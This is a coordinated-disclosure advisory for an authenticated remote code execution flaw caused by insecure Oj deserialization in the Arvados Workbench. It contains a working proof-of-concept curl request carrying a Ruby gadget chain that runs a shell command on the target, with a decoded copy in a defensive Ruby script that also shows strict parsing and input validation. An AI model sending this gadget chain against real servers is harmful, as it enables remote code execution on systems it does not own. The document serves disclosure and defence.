Coordinated Disclosure Timeline
- 2022-08-03: Sent report to Arvados maintainers
- 2022-08-03: Arvados maintainers acknowledged receiving the report
- 2022-08-12: Advisory was published
A remote code execution (RCE) vulnerability in the Arvados Workbench allowed authenticated attackers to execute arbitrary code via specially crafted JSON payloads.
Issue: Authenticated remote code execution due to insecure deserialization (
The Arvados Workbench uses Oj for deserializing JSON payloads from remote sources. When Oj.load is used without a restricting mode (Oj's default mode is :object, which honours the ^o and ^c class hints embedded in the document), arbitrary Ruby objects can be deserialized. Deserializing untrusted data with any method that can construct arbitrary objects is easily exploitable and, in many cases, lets an attacker execute arbitrary code. So-called "gadget chains" that allow code execution exist for all versions of Ruby.
The Arvados Workbench exposes a search endpoint which uses Oj.load to deserialize a JSON-based filter query parameter. Authenticated attackers able to send arbitrary requests to this endpoint will be able to achieve remote code execution (RCE). The same is likely true for the combine_selected_files_into_collection action inside of
Proof of concept (for Ruby 2.x)
The search endpoint can be attacked with the following deserialization gadget chain, which creates the file /tmp/pwned.txt on the attacked Arvados system (the test was performed against a setup as described on the Arvados-in-a-box page):

```bash
curl -i -s -k -X $'GET' \
  -H $'Host: 172.17.0.2' \
  -H $'Accept: application/json' \
  -H $'X-Csrf-Token: [..]' \
  -b $'_arvados_workbench_session=[..]' \
  $'https://172.17.0.2/search/choose?partial=true&filters=%7B%22%5E%231%22%3A%5B%5B%7B%22%5Ec%22%3A%22Gem%3A%3ASpecFetcher%22%7D%2C%7B%22%5Ec%22%3A%22Gem%3A%3AInstaller%22%7D%2C%7B%22%5Eo%22%3A%22Gem%3A%3ARequirement%22%2C%22requirements%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Net%3A%3ABufferedIO%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%3A%3AEntry%22%2C%22read%22%3A0%2C%22header%22%3A%22any%22%7D%2C%22debug%5Foutput%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3ARequestSet%22%2C%22sets%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Ec%22%3A%22Kernel%22%7D%2C%22method%5Fid%22%3A%22%3Aspawn%22%7D%2C%22git%5Fset%22%3A%22date%20%3E%3E%20%2Ftmp%2Fpwned%2Etxt%22%7D%2C%22method%5Fid%22%3A%22%3Aresolve%22%7D%7D%7D%7D%5D%2C%22any%22%5D%7D'
```
(Hint: replace the X-Csrf-Token header and the _arvados_workbench_session cookie with valid, authenticated values.)
- The above payload for Ruby 2.x is based on a gadget chain for Marshal.load originally discovered by William Bowling aka vakzz.
- A payload for Oj.load such as the one above can be found in this blog post from Bishop Fox.
- We are in possession of an undisclosed Oj.load payload for Ruby 3.x that is based on the newest Marshal.load gadget chain from William Bowling.
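The following Ruby script is an added example (not code from the GHSL advisory or from Arvados) that decodes the filters parameter of the PoC above, lists every class that Oj's default :object mode would instantiate for it, and shows the hardened way to read such a parameter: parse with a strict, data-only parser and then validate the shape. The filter shape ([attribute, operator, operand] triples) is modelled on the Arvados API filter format, and the operator allowlist and attribute regex are assumptions made for this example; nothing here executes the gadget chain.

```ruby
require 'json'

begin
  require 'oj' # optional: only used to show the hardened Oj call when the gem is installed
rescue LoadError
  # Oj is absent here; the stdlib JSON parser has the same strict, data-only property.
end

# URL-decoded form of the `filters` parameter from the curl request above,
# i.e. the bytes the Workbench hands to Oj.load. "^o" asks Oj's :object mode to
# allocate an instance of the named class and set its instance variables from
# the remaining keys; "^c" resolves a class; "^#1" builds a hash pair whose key
# is the first array element (hashing that key is what fires the chain).
POC_FILTERS = <<~'JSON'
  {"^#1":[[{"^c":"Gem::SpecFetcher"},{"^c":"Gem::Installer"},
    {"^o":"Gem::Requirement","requirements":{"^o":"Gem::Package::TarReader","io":{
      "^o":"Net::BufferedIO","io":{"^o":"Gem::Package::TarReader::Entry","read":0,"header":"any"},
      "debug_output":{"^o":"Net::WriteAdapter","socket":{"^o":"Gem::RequestSet",
        "sets":{"^o":"Net::WriteAdapter","socket":{"^c":"Kernel"},"method_id":":spawn"},
        "git_set":"date >> /tmp/pwned.txt"},"method_id":":resolve"}}}}],"any"]}
JSON

# Parse untrusted JSON into plain data only (Hash, Array, String, Numeric,
# true, false, nil). With Oj this is the one-line fix: mode: :strict (or
# Oj.strict_load) ignores every class hint. Without Oj, JSON.parse has the
# same property (create_additions is off by default; never use JSON.load or
# create_additions: true on request data).
def strict_load(text)
  if defined?(Oj)
    Oj.load(text, mode: :strict)
  else
    JSON.parse(text)
  end
end

# Walk a strictly parsed document and collect the classes that Oj's :object
# mode would have resolved or instantiated. Useful as a triage check on a
# captured request body or a log line before anyone feeds it to Oj.load.
def oj_object_hints(node, found = [])
  case node
  when Hash
    found << node['^o'] if node.key?('^o')
    found << node['^c'] if node.key?('^c')
    node.each_value { |v| oj_object_hints(v, found) }
  when Array
    node.each { |v| oj_object_hints(v, found) }
  end
  found
end

class FilterError < ArgumentError; end

# Assumed allowlist for this example; Arvados' real operator set is not taken
# from its code here.
FILTER_OPERATORS = ['=', '!=', '<', '<=', '>', '>=', 'like', 'ilike', 'in', 'not in'].freeze
SCALAR_TYPES = [String, Numeric, TrueClass, FalseClass, NilClass].freeze

# Hardened reader for a filters query parameter: strict parse, then validate
# that the result is an Array of [attribute, operator, operand] triples.
# Returns the validated triples or raises FilterError.
def parse_filters(param)
  data = begin
    strict_load(param)
  rescue StandardError => e # JSON::ParserError or Oj::ParseError
    raise FilterError, "filters is not valid JSON: #{e.message}"
  end
  raise FilterError, 'filters must be an array of [attribute, operator, operand] triples' unless data.is_a?(Array)

  data.map do |triple|
    raise FilterError, "bad filter #{triple.inspect}" unless triple.is_a?(Array) && triple.size == 3
    attr, op, operand = triple
    unless attr.is_a?(String) && attr.match?(/\A[a-z_][a-z0-9_.]*\z/)
      raise FilterError, "bad attribute #{attr.inspect}"
    end
    raise FilterError, "unsupported operator #{op.inspect}" unless FILTER_OPERATORS.include?(op)
    scalar = ->(x) { SCALAR_TYPES.any? { |k| x.is_a?(k) } }
    ok = if ['in', 'not in'].include?(op)
           operand.is_a?(Array) && operand.all?(&scalar)
         else
           scalar.call(operand)
         end
    raise FilterError, "bad operand for #{op}: #{operand.inspect}" unless ok
    [attr, op, operand]
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "classes the PoC would instantiate in :object mode: #{oj_object_hints(strict_load(POC_FILTERS)).inspect}"
  begin
    parse_filters(POC_FILTERS)
  rescue FilterError => e
    puts "PoC rejected: #{e.message}"
  end
  # constructed benign input
  puts parse_filters('[["name","like","demo%"],["owner_uuid","in",["a","b"]]]').inspect
end
```

Switching the Workbench call to Oj.load(param, mode: :strict), or setting Oj.default_options = { mode: :strict } process-wide, removes the object-construction path on its own; the shape validation on top of it is defence in depth and also rejects the PoC at the structural level (its top level is a Hash, not an Array of triples). Do not run the decoded payload through a default-mode Oj.load to "confirm" this: on a host with rubygems loaded it will execute the embedded command.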
This issue may lead to Remote Code Execution (RCE)
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
You can contact the GHSL team at firstname.lastname@example.org; please include a reference to GHSL-2022-063 in any communication regarding this issue.